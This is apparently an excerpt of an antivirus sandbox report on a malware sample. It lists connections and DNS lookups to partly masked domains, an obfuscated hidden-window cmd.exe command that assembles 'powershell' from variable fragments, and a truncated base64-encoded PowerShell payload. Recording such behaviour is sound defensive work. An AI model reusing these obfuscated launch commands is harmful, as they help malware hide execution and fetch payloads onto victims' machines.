Техническая информация
- '<SYSTEM32>\cmd.exe' /v /c "set %WQrNtXdhO%=wers&&set %aMlvUiZdj%=HMHloswwt&&set %hJGMOKfrD%=po&&set %PUPjijvCV%=nnOjvlbLw&&set %GcWNjKmII%=hell&&set %WbwNnQrWU%=GqhXTOtCd&&!%hJGMOKfrD%!!%WQrNtXdhO%!!...
- '07.sk':80
- 'te#####ons-coquines.fr':80
- 'ma#####folkeringa.nl':80
- 'ma#####folkeringa.nl':443
- 'a-##s.it':80
- 'ma#####folkeringa.nl':443
- DNS ASK 07.sk
- DNS ASK ap####xamprep.com
- DNS ASK te#####ons-coquines.fr
- DNS ASK ma#####folkeringa.nl
- DNS ASK a-##s.it
- '<SYSTEM32>\cmd.exe' /v /c "set %WQrNtXdhO%=wers&&set %aMlvUiZdj%=HMHloswwt&&set %hJGMOKfrD%=po&&set %PUPjijvCV%=nnOjvlbLw&&set %GcWNjKmII%=hell&&set %WbwNnQrWU%=GqhXTOtCd&&!%hJGMOKfrD%!!%WQrNtXdhO%!!...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAdgBFAHIAYgBvAHMARQBwAFIARQBGAEUAcgBFAE4AQwBFAC4AVABvAFMAVAByAEkAbgBnACgAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoATwBJAG4AJwAnACkAIAAoACAALQBKAG8ASQBuACgAIAAnADMANgBuADEAMQA5AH0AMQAxAD...